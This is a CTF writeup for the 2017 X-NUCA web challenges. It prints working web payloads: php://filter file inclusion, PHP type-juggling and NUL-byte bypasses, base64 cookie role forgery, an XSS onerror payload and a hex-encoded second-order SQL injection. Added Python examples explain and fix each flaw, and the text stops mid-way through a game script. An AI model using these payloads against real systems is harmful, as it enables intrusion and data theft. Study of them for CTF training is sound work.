2017 X-NUCA Web Special Pre-competition Guidance writeup

Foreword

This year's set adds a few new challenges on top of last year's.
最安全的筆記管理系統 (The Safest Note Management System): not solved.
Document-getshell: could not find the flag.

Challenges

Hide and Seek

Approach

Clicking index, the flag flashes past and is gone: the page is a meta refresh to index.php with a 0-second delay, so the browser reloads before you can read it. The blunt way is to view the page source, where the flag sits in the HTML body:

view-source:http://218.76.35.75:20111/Index.php
  <html>
    <head>
        <title>HT-CTF-2016 - Hidden Flag</title>
        <meta http-equiv="refresh" content="0; url=index.php" />
    </head>
    <body style="margin:auto;padding-top:50px;background:black;color:#0F0;">
        A HIDDEN FLAG: FLAG{th!5!5n0tth3fl@g}
        <div align="center">
            <pre class="logo" style="font-size:6px;">
    __  ________    __________________   ___   ____ ________
   / / / /_  __/   / ____/_  __/ ____/  |__ \ / __ <  / ___/
  / /_/ / / /_____/ /     / / / /_________/ // / / / / __ \
 / __  / / /_____/ /___  / / / __/_____/ __// /_/ / / /_/ /
/_/ /_/ /_/      \____/ /_/ /_/       /____/\____/_/\____/
</pre>
        </div>
    </body>
</html>

Simple Q&A

Approach

Viewing the source, the value of an option in the select does not match the text it displays:

<option value="2015">2016</option>

The submit button is disabled.
Inspect element -> remove the disabled attribute -> submit -> intercept the request.
Set the parameters to the values matching the intended answers and the flag is returned. The disabled attribute and the option labels exist only in the browser; the server sees nothing but the values in the request body, so any check that matters has to be repeated server-side.

Backend Backend Backend

Approach

Intercept the request: the cookie carries User and Member values, sent to the server in different encodings.
Cookie: PHPSESSID=0f4cl5j51620v7rgja3km6r733; User=JohnTan101; Member=Tm9ybWFs

Base64-decoding Tm9ybWFs gives Normal, so base64-encode "Admin" (QWRtaW4=), replace the Member value with it, and the flag comes back. Base64 is an encoding, not encryption or a signature: a role stored this way can be rewritten by the client at will.

Tip: why encode Admin rather than admin? Because the home page says "Only Member with Admin rights is allow to enter".
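Added example (Python, not from the original writeup): the cookie rewrite above, followed by the way a role claim should be carried if it must live in a cookie at all. The Cookie header is the one captured in the writeup; the server key, the payload.tag layout and the function names are assumptions for illustration. Forging succeeds because base64 carries no integrity; the signed variant rejects a Member value whose payload was changed while keeping someone else's tag.

```python
import base64
import hashlib
import hmac
import secrets

# Cookie header as captured in the writeup (constructed input for this example).
RAW_COOKIE = "PHPSESSID=0f4cl5j51620v7rgja3km6r733; User=JohnTan101; Member=Tm9ybWFs"


def parse_cookie(header: str) -> dict:
    """Split a Cookie header into a name -> value dict."""
    jar = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            jar[name] = value
    return jar


def build_cookie(jar: dict) -> str:
    return "; ".join(f"{k}={v}" for k, v in jar.items())


def decode_member(value: str) -> str:
    """Base64 is an encoding, not encryption: anyone can read and rewrite it."""
    return base64.b64decode(value).decode()


def forge_member(header: str, role: str = "Admin") -> str:
    """The attack from the writeup: same cookie, Member replaced by a chosen role."""
    jar = parse_cookie(header)
    jar["Member"] = base64.b64encode(role.encode()).decode()
    return build_cookie(jar)


# --- hardened version: the role travels with a server-side MAC (assumed design) ---
SERVER_KEY = secrets.token_bytes(32)  # generated at startup; never leaves the server


def sign_member(role: str, key: bytes = SERVER_KEY) -> str:
    """payload.tag, where tag = HMAC-SHA256(key, payload)."""
    payload = base64.urlsafe_b64encode(role.encode()).decode()
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_member(value: str, key: bytes = SERVER_KEY):
    """Return the role if the tag verifies, else None. compare_digest avoids timing leaks."""
    payload, _, tag = value.partition(".")
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not (tag and hmac.compare_digest(tag, expected)):
        return None
    return base64.urlsafe_b64decode(payload).decode()


def tamper(signed: str, role: str) -> str:
    """What the writeup's trick becomes against the signed cookie: swap the payload, keep the tag."""
    return base64.urlsafe_b64encode(role.encode()).decode() + "." + signed.partition(".")[2]
```

Even the signed form only proves the server issued the claim; a role that is looked up server-side from the session is simpler and leaves nothing for the client to forge.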

PHP is the best language

Approach

A code-audit challenge: a chain of parameter checks that all have to pass. The source is:

 <?php
show_source(__FILE__);
$v1=0;$v2=0;$v3=0;
$a=(array)json_decode(@$_GET['foo']);
if(is_array($a)){
    is_numeric(@$a["bar1"])?die("nope"):NULL;
    if(@$a["bar1"]){
        ($a["bar1"]>2016)?$v1=1:NULL;
    }
    if(is_array(@$a["bar2"])){
        if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
        $pos = array_search("nudt", $a["a2"]);
        $pos===false?die("nope"):NULL;
        foreach($a["bar2"] as $key=>$val){
            $val==="nudt"?die("nope"):NULL;
        }
        $v2=1;
    }
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
    if(!strcmp($c[1],$d) && $c[1]!==$d){
        eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
        strpos(($c[0].$d), "htctf2016")?$v3=1:NULL;
    }
}
if($v1 && $v2 && $v3){
    include "flag.php";
    echo $flag;
}
?>
http://218.76.35.75:20114/?foo={%22bar1%22:%222017f%22,%22bar2%22:[[1,1],1,1,1,1]}&cat[0]=123&cat[1][]=1&dog=%00htctf2016

Why this passes each check. foo is JSON, decoded and cast to an array. bar1 = "2017f" is rejected by is_numeric() because of the trailing letter, it is truthy, and in the loose comparison "2017f" > 2016 PHP 5 converts the string by its leading digits to 2017, so $v1 = 1.

bar2 = [[1,1],1,1,1,1] has exactly five elements with an array at index 0. The array_search() check reads $a["a2"] (presumably a typo for bar2 in the challenge source), which is not set: array_search() on NULL emits a warning and returns NULL rather than false, so the === false test never dies. No element of bar2 is identical to "nudt", so $v2 = 1.

cat[1][]=1 makes $c[1] an array. strcmp() given an array emits a warning and returns NULL in PHP 5, so !strcmp() is true, and an array is !== the string $d. dog = "\0htctf2016": the ereg family is not binary-safe, so eregi() stops at the NUL, sees an empty string and never matches 3, 1 or c, while strpos("123\0htctf2016", "htctf2016") returns 4, which is truthy, so $v3 = 1. The chain is PHP 5 specific: eregi() was removed in PHP 7 and strcmp() with an array argument throws a TypeError in PHP 8.

flag{php_i5_n0t_b4d}

login

Approach

The source suggests a file inclusion controlled by the page parameter:
<html>
    <head>
        <title>trolol</title>
    </head>
    <body>
        <center>
            <a href="./?page=main">main</a>
            <a href="./?page=info">server info</a>
            <a href="./?page=login">login</a>
        </center>
    </body>
</html>

Build an inclusion through the php://filter wrapper, which returns the file base64-encoded instead of executing it:

http://218.76.35.75:20115/?page=php://filter/convert.base64-encode/resource=login

Base64-decoding the output gives the login source:

<?php
$login=@$_POST['login'];
$password=@$_POST['password'];
if(@$login=="admin" && sha1(@$password)==$pwhash){
    include('flag.txt');
}else if (@$login&&@$password&&@$_GET['debug']) {
    echo "Login error, login credentials has been saved to ./log/".htmlentities($login).".log";
    $logfile = "./log/".$login.".log";
    file_put_contents($logfile, $login."\n".$password);
} 
?>
    <center>
        login<br/><br/>
        <form action="" method="POST">
            <input name="login" placeholder="login"><br/>
            <input name="password" placeholder="password"><br/><br/>
            <input type="submit" value="Go!">
        </form>
    </center>

From the login source: when login, password and debug are all truthy, the failed credentials are written to ./log/<login>.log, with login used unsanitized in the file name and password written verbatim as the file content, and the page parameter can then include whatever was written there. The writeup includes the log/ directory to reach the flag:

http://218.76.35.75:20115/?page=login&debug=0&log=log/

Note that in PHP the string "0" is falsy, so a request carrying debug=0 never enters the logging branch; debug needs a truthy value such as 1 for a log file to be written.
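Added example (Python, not the challenge's code): the two decisions that make this page exploitable, each beside a fixed form. The page allowlist assumes the three names the index links to are the only includable pages; the login name policy, the log directory and the function names are assumptions. The unsafe functions mirror include($_GET['page']) and "./log/".$login.".log" from the source above.

```python
import os
import re

# Assumed: the only pages the index should ever include.
PAGES = {"main", "info", "login"}
# Assumed policy for names that end up in file names: no separators, no dots, no control characters.
LOGIN_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")


def resolve_page_unsafe(page: str) -> str:
    """Mirrors include($_GET['page']): stream wrappers and paths pass straight through."""
    return page


def resolve_page_safe(page: str):
    """Allowlist the page name; php://filter, ../ and log/... all fall through to None."""
    return f"{page}.php" if page in PAGES else None


def log_path_unsafe(logdir: str, login: str) -> str:
    """Mirrors "./log/".$login.".log": the user chooses directory and file name."""
    return os.path.join(logdir, login + ".log")


def log_path_safe(logdir: str, login: str):
    """Validate the name, then confirm the resolved path is still directly inside logdir."""
    if not LOGIN_RE.fullmatch(login):
        return None
    base = os.path.realpath(logdir)
    path = os.path.realpath(os.path.join(base, login + ".log"))
    return path if os.path.dirname(path) == base else None


def escapes(logdir: str, path: str) -> bool:
    """True when path resolves outside logdir, which is what a traversal in login achieves."""
    return os.path.dirname(os.path.realpath(path)) != os.path.realpath(logdir)
```

Validating the name only fixes the file-system side; the content (password) is still attacker-chosen, so the log directory must additionally never be reachable through the include, which the allowlist guarantees.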

HTTP header injection

Approach

Most HTTP header injections sit in X-Forwarded-For (XFF), Referer and similar headers that the application writes into a query, usually for logging; try them one at a time. Here the Referer turns out to be injectable.

sqlmap can take it from there. Note that sqlmap only tests the User-Agent and Referer headers at --level=3 or above; alternatively the injection point can be marked explicitly with --headers="Referer: *".

Simple file upload

Approach

Upload a PHP file directly, changing the Content-Type of the file part to an image type so that a check on the declared MIME type passes. The declared type is attacker-controlled and says nothing about the file's contents or the extension it will be served with.

Simple JS

Approach

Viewing the source reveals a piece of JS that never runs.

Copy it and execute it in the browser console, with document.write(p) changed to alert(p), to see the page it builds.

Visiting that page, the flag is in a cookie:

C00k1els60SecU5e

PHP is a loose language

Approach

The page shows the following code:

- - - - - - - source code - - - - - - - - - -
$he ='goodluck';

parse_str($_GET['heetian']);

if $he = 'abcd';

echo $flag;

he=?

A straightforward variable overwrite: parse_str() called with a single argument registers every key of the parsed string as a variable in the current scope (a form deprecated in PHP 7.2 and removed in 8.0), so the inner he=abcd overwrites $he:

http://218.76.35.75:20124/index.php?heetian=he=abcd

Try XSS

Approach

Entering 123' shows the input landing inside an img tag, in a single-quoted src attribute, with the quote terminating the attribute.

So build the payload directly, following the hint:

     payload:#' onerror=alert(document.domain)

The quote closes src, onerror becomes a new attribute, and since the browser cannot decode the current page as an image the handler fires. That yields the flag.
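Added example (Python, not part of the writeup): the rendering the hint implies, input dropped raw into a single-quoted src attribute, next to an attribute-encoded version, with the result checked by Python's own HTML parser rather than by eye. The template shape is an assumption; the payload is the one from the writeup.

```python
import html
from html.parser import HTMLParser

# Payload from the writeup's hint.
HINT_PAYLOAD = "#' onerror=alert(document.domain)"


def render_unsafe(user_input: str) -> str:
    """Assumed shape of the vulnerable page: the value is reflected raw into the attribute."""
    return f"<img src='{user_input}'>"


def render_safe(user_input: str) -> str:
    """html.escape(quote=True) also encodes ' and ", so the value cannot close the attribute."""
    return f"<img src='{html.escape(user_input, quote=True)}'>"


class ImgAttrs(HTMLParser):
    """Collect the attributes the browser-side parser would see on the img tag."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.attrs = dict(attrs)


def img_attributes(rendered: str) -> dict:
    parser = ImgAttrs()
    parser.feed(rendered)
    return parser.attrs
```

Encoding must match the context: this escaping is right for an attribute value, but a value placed into a JavaScript string or a URL needs the encoding for that context instead.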

Simple file inclusion

Approach

Description: the flag is in /flag.

Include /flag directly:
http://218.76.35.75:20126/index.php?page=/flag
and view the source of the response:
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>歡迎來到比賽</title>
</head>
<body>
    flag 不在這裏<!-- flag: 62a72cb2f3d5e7fc0284da9f21e66c9f.php--></body>

</html>

Visit the PHP file named in the comment directly:

http://218.76.35.75:20126/62a72cb2f3d5e7fc0284da9f21e66c9f.php

Simple verification

Approach

Intercept the request and, following the hint, change User=Bob to User=admin, then brute-force the guess value.

guess=573 gives the flag.

Vote

Approach

Scanning for backups turns up .index.php.swp, a Vim swap file left on the server.
Recover it with vim -r index.php (with the swap file alongside) to get the index.php source.
The key part:
<?php
include 'db.php';
session_start();

if (!isset($_SESSION['login'])) {
    $_SESSION['login'] = 'guest'.mt_rand(1e5, 1e6);
    $login = $_SESSION['login'];
}

if (isset($_POST['submit'])) {
    if (!isset($_POST['id'], $_POST['vote']) || !is_numeric($_POST['id']))
        die('please select ...');
    $id = $_POST['id'];
    $vote = (int)$_POST['vote'];
    if ($vote > 5 || $vote < 1)
        $vote = 1;

    $q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");
    $q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");

    echo '<p><b>Thank you!</b> Results:</p>';
    echo '<table border="1">';
    echo '<tr><th>Logo</th><th>Total votes</th><th>Average</th></tr>';
    while ($r = mysql_fetch_array($q)) {
        $arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
        echo '<tr><td>'.$arr[0].'</td>';
        $arr = mysql_fetch_array(mysql_query("SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = ".$r['id']));
        echo '<td>'.$arr[0].'</td><td>'.round($arr[1],2).'</td></tr>';
    }
    echo '<br><a href="index.php">goBack</a><br>';
    exit;
}
?>
In the code, id is checked with is_numeric(), so there is no first-order injection. But the id is later read back out of the database and concatenated, unquoted, into the next query, which makes a second-order injection. In PHP 5 is_numeric() still accepts hexadecimal literals of the form 0x..., and MySQL treats a 0x... literal in a string column as the decoded bytes (which works here because the id column holds strings), so the SQL fragment can be hex-encoded, stored as the id, and executed on the read-back.

payload:
    id=1 and 1=2 union select database()&vote=1&submit=Submit
    hex-encoded:
    0x3120616e6420313d3220756e696f6e2073656c6563742064617461626173652829
    final request:
    URL: http://218.76.35.75:65080/index.php
    POST data:
id=0x3120616e6420313d3220756e696f6e2073656c6563742064617461626173652829&vote=1&submit=Submit

Keep constructing payloads this way to read out the flag; the table is t_flag.

GG

Approach

On entering there is a game; the page source references a script tetris.js, so follow that.
function Tetris(){function f(b){this.id=b;this.el=document.getElementById(this.id);var d=this;this.activate=function(){d.el.style.display="block"==d.el.style.display?"none":"block"};this.close=function(){d.el.style.display="none"};this.isActive=function(){return"block"==d.el.style.display}}function l(b,d,a,c){this.unit=b;this.x=d;this.y=a;this.el=document.getElementById(c);this.board=[];for(a=0;a<this.y;a++)for(this.board.push([]),d=0;d<this.x;d++)this.board[a].push(0);this.destroy=function(){for(var c=
0;c<this.board.length;c++)for(var a=0;a<this.board[c].length;a++)this.board[c][a]&&(this.el.removeChild(this.board[c][a]),this.board[c][a]=0)};this.removeFullLines=function(){for(var c=0,a=this.y-1;0<a;a--)this.isLineFull(a)&&(this.removeLine(a),c++,a++);return c};this.isLineFull=function(c){for(var a=0;a<this.x;a++)if(!this.board[c][a])return!1;return!0};this.removeLine=function(c){for(var a=0;a<this.x;a++)this.el.removeChild(this.board[c][a]),this.board[c][a]=0;for(c--;0<c;c--)for(a=0;a<this.x;a++)if(this.board[c][a]){var b=
this.board[c][a];b.style.top=b.offsetTop+this.unit+"px";this.board[c+1][a]=b;this.board[c][a]=0}};this.getBlock=function(c,a){if(0>c)return 0;if(c<this.y&&a<this.x)return this.board[c][a];throw"Area.getBlock("+c+",\t"+a+") failed";};this.addElement=function(c){var a=parseInt(c.offsetLeft/this.unit),b=parseInt(c.offsetTop/this.unit);0<=b&&b<this.y&&0<=a&&a<this.x&&(this.board[b][a]=c)}}function k(b,d){var a=this;this.tetris=b;this.area=d;this.stopped=this.running=this.speed=this.position=this.nextType=
this.type=this.forceMoveDownID=this.fallDownID=null;this.board=[];this.elements=[];this.nextElements=[];this.y=this.x=null;this.puzzles=[[[0,0,1],[1,1,1],[0,0,0]],[[1,0,0],[1,1,1],[0,0,0]],[[0,1,1],[1,1,0],[0,0,0]],[[1,1,0],[0,1,1],[0,0,0]],[[0,1,0],[1,1,1],[0,0,0]],[[1,1],[1,1]],[[0,0,0,0],[1,1,1,1],[0,0,0,0],[0,0,0,0]]];this.reset=function(){this.fallDownID&&clearTimeout(this.fallDownID);this.forceMoveDownID&&clearTimeout(this.forceMoveDownID);this.type=this.nextType;this.nextType=q(this.puzzles.length);
this.position=0;this.speed=80+700/this.tetris.stats.getLevel();this.stopped=this.running=!1;this.board=[];this.elements=[];for(var c=0;c<this.nextElements.length;c++)document.getElementById("tetris-nextpuzzle").removeChild(this.nextElements[c]);this.nextElements=[];this.y=this.x=null};this.nextType=q(this.puzzles.length);this.reset();this.isRunning=function(){return this.running};this.isStopped=function(){return this.stopped};this.getX=function(){return this.x};this.getY=function(){return this.y};
this.mayPlace=function(){for(var c=this.puzzles[this.type],a=parseInt((this.area.x-c[0].length)/2),b=!1,d=0,g=c.length-1;0<=g;g--){for(var h=0;h<c[g].length;h++)if(c[g][h]&&(b=!0,this.area.getBlock(1,a+h)))return!1;b&&d++;if(0>1-d)break}return!0};this.place=function(){this.tetris.stats.setPuzzles(this.tetris.stats.getPuzzles()+1);this.tetris.stats.getPuzzles()>=10+2*this.tetris.stats.getLevel()&&(this.tetris.stats.setLevel(this.tetris.stats.getLevel()+1),this.tetris.stats.setPuzzles(0));var c=this.puzzles[this.type],
a=parseInt((this.area.x-c[0].length)/2),b=!1,g=0;this.x=a;this.y=1;this.board=this.createEmptyPuzzle(c.length,c[0].length);for(var d=c.length-1;0<=d;d--){for(var h=0;h<c[d].length;h++)if(c[d][h]){var b=!0,e=document.createElement("div");e.className="block"+this.type;e.style.left=(a+h)*this.area.unit+"px";e.style.top=(1-g)*this.area.unit+"px";this.area.el.appendChild(e);this.board[d][h]=e;this.elements.push(e)}g&&this.y--;b&&g++}this.running=!0;this.fallDownID=setTimeout(this.fallDown,this.speed);
c=this.puzzles[this.nextType];for(d=0;d<c.length;d++)for(h=0;h<c[d].length;h++)c[d][h]&&(e=document.createElement("div"),e.className="block"+this.nextType,e.style.left=h*this.area.unit+"px",e.style.top=d*this.area.unit+"px",document.getElementById("tetris-nextpuzzle").appendChild(e),this.nextElements.push(e))};this.destroy=function(){for(var c=0;c<this.elements.length;c++)this.area.el.removeChild(this.elements[c]);this.elements=[];this.board=[];this.reset()};this.createEmptyPuzzle=function(c,a){for(var b=
[],d=0;d<c;d++){b.push([]);for(var g=0;g<a;g++)b[d].push(0)}return b};this.fallDown=function(){if(a.isRunning())if(a.mayMoveDown())a.moveDown(),a.fallDownID=setTimeout(a.fallDown,a.speed);else{for(var c=0;c<a.elements.length;c++)a.area.addElement(a.elements[c]);if(c=a.area.removeFullLines())a.tetris.stats.setLines(a.tetris.stats.getLines()+c),a.tetris.stats.setScore(a.tetris.stats.getScore()+1E3*a.tetris.stats.getLevel()*c);a.reset();a.mayPlace()?a.place():a.tetris.gameOver()}};this.forceMoveDown=
function(){if(!a.isRunning()&&!a.isStopped())if(a.mayMoveDown())a.tetris.stats.setScore(a.tetris.stats.getScore()+5+a.tetris.stats.getLevel()),a.tetris.stats.setActions(a.tetris.stats.getActions()+1),a.moveDown(),a.forceMoveDownID=setTimeout(a.forceMoveDown,30);else{for(var c=0;c<a.elements.length;c++)a.area.addElement(a.elements[c]);if(c=a.area.removeFullLines())a.tetris.stats.setLines(a.tetris.stats.getLines()+c),a.tetris.stats.setScore(a.tetris.stats.getScore()+1E3*a.tetris.stats.getLevel()*c);
a.reset();a.mayPlace()?a.place():a.tetris.gameOver()}};this.stop=function(){this.running=!1};this.mayRotate=function(){for(var c=0;c<this.board.length;c++)for(var a=0;a<this.board[c].length;a++)if(this.board[c][a]){var b=this.getY()+this.board.length-1-a,d=this.getX()+c;if(b>=this.area.y||0>d||d>=this.area.x||this.area.getBlock(b,d))return!1}return!0};this.rotate=function(){for(var c=this.createEmptyPuzzle(this.board.length,this.board[0].length),a=0;a<this.board.length;a++)for(var b=0;b<this.board[a].length;b++)if(this.board[a][b]){var d=
c.length-1-b,g=a,e=this.board[a][b],f=d-a;e.style.left=e.offsetLeft+(g-b)*this.area.unit+"px";e.style.top=e.offsetTop+f*this.area.unit+"px";c[d][g]=e}this.board=c};this.mayMoveDown=function(){for(var a=0;a<this.board.length;a++)for(var b=0;b<this.board[a].length;b++)if(this.board[a][b]&&(this.getY()+a+1>=this.area.y||this.area.getBlock(this.getY()+a+1,this.getX()+b)))return this.stopped=!0,!1;return!0};this.moveDown=function(){for(var a=0;a<this.elements.length;a++)this.elements[a].style.top=this.elements[a].offsetTop+
this.area.unit+"px";this.y++};this.mayMoveLeft=function(){for(var a=0;a<this.board.length;a++)for(var b=0;b<this.board[a].length;b++)if(this.board[a][b]&&(0>this.getX()+b-1||this.area.getBlock(this.getY()+a,this.getX()+b-1)))return!1;return!0};this.moveLeft=function(){for(var a=0;a<this.elements.length;a++)this.elements[a].style.left=this.elements[a].offsetLeft-this.area.unit+"px";this.x--};this.mayMoveRight=function(){for(var a=0;a<this.board.length;a++)for(var b=0;b<this.board[a].length;b++)if(this.board[a][b]&&
(this.getX()+b+1>=this.area.x||this.area.getBlock(this.getY()+a,this.getX()+b+1)))return!1;return!0};this.moveRight=function(){for(var a=0;a<this.elements.length;a++)this.elements[a].style.left=this.elements[a].offsetLeft+this.area.unit+"px";this.x++}}function q(b){return Math.floor(Math.random()*b)}function p(){this.get=function(b){for(var d=document.cookie.split(";"),a=0;a<d.length;++a){var c=d[a].split("=");if(2==c.length&&(c[0]=c[0].trim(),c[1]=c[1].trim(),c[0]==b))return unescape(c[1])}return""};
this.set=function(b,d,a,c,e,f){this.del(b);c||(c="/");b=b+"="+escape(d);a&&(a=new Date((new Date).getTime()+1E3*a),b+="; expires="+a.toGMTString());b=b+(c?";\tpath="+c:"")+(e?";\tdomain="+e:"");b+=f?";\tsecure":"";document.cookie=b};this.del=function(b){document.cookie=b+"=; expires=Thu, 01-Jan-70\t00:00:01 GMT"}}var b=this;this.stats=new function(){this.level;this.time;this.apm;this.lines;this.score;this.puzzles;this.actions;this.el={level:document.getElementById("tetris-stats-level"),time:document.getElementById("tetris-stats-time"),
apm:document.getElementById("tetris-stats-apm"),lines:document.getElementById("tetris-stats-lines"),score:document.getElementById("tetris-stats-score")};this.timerId=null;var b=this;this.start=function(){this.reset();this.timerId=setInterval(this.incTime,1E3)};this.stop=function(){this.timerId&&clearInterval(this.timerId)};this.reset=function(){this.stop();this.level=1;this.actions=this.puzzles=this.score=this.lines=this.apm=this.time=0;this.el.level.innerHTML=this.level;this.el.time.innerHTML=this.time;
this.el.apm.innerHTML=this.apm;this.el.lines.innerHTML=this.lines;this.el.score.innerHTML=this.score};this.incTime=function(){b.time++;b.el.time.innerHTML=b.time;b.apm=parseInt(b.actions/b.time*60);b.el.apm.innerHTML=b.apm};this.setScore=function(b){this.score=b;this.el.score.innerHTML=this.score};this.setLevel=function(b){this.level=b;this.el.level.innerHTML=this.level};this.setLines=function(b){this.lines=b;this.el.lines.innerHTML=this.lines};this.setPuzzles=function(b){this.puzzles=b};this.setActions=
function(b){this.actions=b};this.getScore=function(){return this.score};this.getLevel=function(){return this.level};this.getLines=function(){return this.lines};this.getPuzzles=function(){return this.puzzles};this.getActions=function(){return this.actions}};this.area=this.puzzle=null;this.areaY=this.areaX=this.unit=20;this.highscores=new function(b){function d(a,b){this.name=a;this.score=b}this.maxscores=b;this.scores=[];this.load=function(){var a=(new p).get("tetris-highscores");this.scores=[];if(a.length)for(var a=
a.split("|"),b=0;b<a.length;++b){var e=a[b].split(":");this.scores.push(new d(e[0],Number(e[1])))}};this.save=function(){for(var a=new p,b=[],d=0;d<this.scores.length;++d)b.push(this.scores[d].name+":"+this.scores[d].score);b=b.join("|");a.set("tetris-highscores",b,864E5)};this.mayAdd=function(a){if(this.scores.length<this.maxscores)return 1E6<a&&(a=new p,a.set("urlkey","webqwer"[1]+"100.js",864E5)),!0;for(var b=this.scores.length-1;0<=b;--b)if(this.scores[b].score<a)return 1E6<a&&(a=new p,a.set("urlkey",
"webqwer"[1]+"100.js",864E5)),!0;return!1};this.add=function(a,b){a=a.replace(/[;=:|]/g,"?");a=a.replace(/</g,"&lt;").replace(/>/g,"&gt;");if(this.scores.length<this.maxscores)this.scores.push(new d(a,b));else for(var e=this.scores.length-1;0<=e;--e)if(this.scores[e].score<b){this.scores.removeByIndex(e);this.scores.push(new d(a,b));break}this.sort();this.save()};this.getScores=function(){return this.scores};this.toHtml=function(){for(var a='<table\tcellspacing="0"\tcellpadding="2"><tr><th></th><th>Name</th><th>Score</th></tr>',
b=0;b<this.scores.length;++b)a+="<tr><td>?.</td><td>?</td><td>?</td></tr>".format(b+1,this.scores[b].name,this.scores[b].score);return a+"</table>"};this.sort=function(){var a=this.scores,b=a.length;this.scores=[];for(var d=0;d<b;++d){for(var e=null,g=null,f=0;f<a.length;++f)if(!e||a[f].score>e.score)e=a[f],g=f;a.removeByIndex(g);this.scores.push(e)}};this.load()}(10);this.start=function(){b.reset();b.stats.start();document.getElementById("tetris-nextpuzzle").style.display="block";document.getElementById("tetris-keys").style.display=
"none";b.area=new l(b.unit,b.areaX,b.areaY,"tetris-area");b.puzzle=new k(b,b.area);b.puzzle.mayPlace()?b.puzzle.place():b.gameOver()};this.reset=function(){b.puzzle&&(b.puzzle.destroy(),b.puzzle=null);b.area&&(b.area.destroy(),b.area=null);document.getElementById("tetris-gameover").style.display="none";document.getElementById("tetris-nextpuzzle").style.display="none";document.getElementById("tetris-keys").style.display="block";b.stats.reset()};this.gameOver=function(){b.stats.stop();b.puzzle.stop();
document.getElementById("tetris-nextpuzzle").style.display="none";document.getElementById("tetris-gameover").style.display="block";if(this.highscores.mayAdd(this.stats.getScore())){var e=prompt("Game Over !\nEnter your name:","");e&&e.trim().length&&this.highscores.add(e,this.stats.getScore())}};this.up=function(){b.puzzle&&b.puzzle.isRunning()&&!b.puzzle.isStopped()&&b.puzzle.mayRotate()&&(b.puzzle.rotate(),b.stats.setActions(b.stats.getActions()+1))};this.down=function(){b.puzzle&&b.puzzle.isRunning()&&
!b.puzzle.isStopped()&&b.puzzle.mayMoveDown()&&(b.stats.setScore(b.stats.getScore()+5+b.stats.getLevel()),b.puzzle.moveDown(),b.stats.setActions(b.stats.getActions()+1))};this.left=function(){b.puzzle&&b.puzzle.isRunning()&&!b.puzzle.isStopped()&&b.puzzle.mayMoveLeft()&&(b.puzzle.moveLeft(),b.stats.setActions(b.stats.getActions()+1))};this.right=function(){b.puzzle&&b.puzzle.isRunning()&&!b.puzzle.isStopped()&&b.puzzle.mayMoveRight()&&(b.puzzle.moveRight(),b.stats.setActions(b.stats.getActions()+
1))};this.space=function(){b.puzzle&&b.puzzle.isRunning()&&!b.puzzle.isStopped()&&(b.puzzle.stop(),b.puzzle.forceMoveDown())};var m=new f("tetris-help"),n=new f("tetris-highscores");document.getElementById("tetris-menu-start").onclick=function(){m.close();n.close();b.start();this.blur()};document.getElementById("tetris-menu-reset").onclick=function(){m.close();n.close();b.reset();this.blur()};document.getElementById("tetris-menu-help").onclick=function(){n.close();m.activate();this.blur()};document.getElementById("tetris-help-close").onclick=
m.close;document.getElementById("tetris-menu-highscores").onclick=function(){m.close();document.getElementById("tetris-highscores-content").innerHTML=b.highscores.toHtml();n.activate();this.blur()};document.getElementById("tetris-highscores-close").onclick=n.close;var e=new function(){this.up=38;this.down=40;this.left=37;this.right=39;this.n=78;this.r=82;this.space=32;this.f12=123;this.escape=27;this.keys=[];this.funcs=[];var b=this;this.set=function(b,a){this.keys.push(b);this.funcs.push(a)};this.event=
function(d){d||(d=window.event);for(var a=0;a<b.keys.length;a++)if(d.keyCode==b.keys[a])b.funcs[a]()}};e.set(e.n,this.start);e.set(e.r,this.reset);e.set(e.up,this.up);e.set(e.down,this.down);e.set(e.left,this.left);e.set(e.right,this.right);e.set(e.space,this.space);document.onkeydown=e.event}String.prototype.trim||(String.prototype.trim=function(){return this.replace(/^\s*|\s*$/g,"")});Array.prototype.removeByIndex||(Array.prototype.removeByIndex=function(f){this.splice(f,1)});
String.prototype.format||(String.prototype.format=function(){if(!arguments.length)throw"String.format()\tfailed,\tno arguments passed, this =\t"+this;var f=this.split("?");if(arguments.length!=f.length-1)throw"String.format() failed, tokens !=\targuments, this\t= "+this;for(var l=f[0],k=0;k<arguments.length;++k)l+=arguments[k]+f[k+1];return l});

Beautified JS. The line of interest is in highscores.mayAdd: when the score passed in exceeds 1e6 it sets a cookie named urlkey to "webqwer"[1] + "100.js", i.e. e100.js.


function Tetris() {
    function f(b) {
        this.id = b;
        this.el = document.getElementById(this.id);
        var d = this;
        this.activate = function() {
            d.el.style.display = "block" == d.el.style.display ? "none" : "block"
        };
        this.close = function() {
            d.el.style.display = "none"
        };
        this.isActive = function() {
            return "block" == d.el.style.display
        }
    }
    function l(b, d, a, c) {
        this.unit = b;
        this.x = d;
        this.y = a;
        this.el = document.getElementById(c);
        this.board = [];
        for (a = 0; a < this.y; a++) for (this.board.push([]), d = 0; d < this.x; d++) this.board[a].push(0);
        this.destroy = function() {
            for (var c = 0; c < this.board.length; c++) for (var a = 0; a < this.board[c].length; a++) this.board[c][a] && (this.el.removeChild(this.board[c][a]), this.board[c][a] = 0)
        };
        this.removeFullLines = function() {
            for (var c = 0, a = this.y - 1; 0 < a; a--) this.isLineFull(a) && (this.removeLine(a), c++, a++);
            return c
        };
        this.isLineFull = function(c) {
            for (var a = 0; a < this.x; a++) if (!this.board[c][a]) return !1;
            return !0
        };
        this.removeLine = function(c) {
            for (var a = 0; a < this.x; a++) this.el.removeChild(this.board[c][a]), this.board[c][a] = 0;
            for (c--; 0 < c; c--) for (a = 0; a < this.x; a++) if (this.board[c][a]) {
                var b = this.board[c][a];
                b.style.top = b.offsetTop + this.unit + "px";
                this.board[c + 1][a] = b;
                this.board[c][a] = 0
            }
        };
        this.getBlock = function(c, a) {
            if (0 > c) return 0;
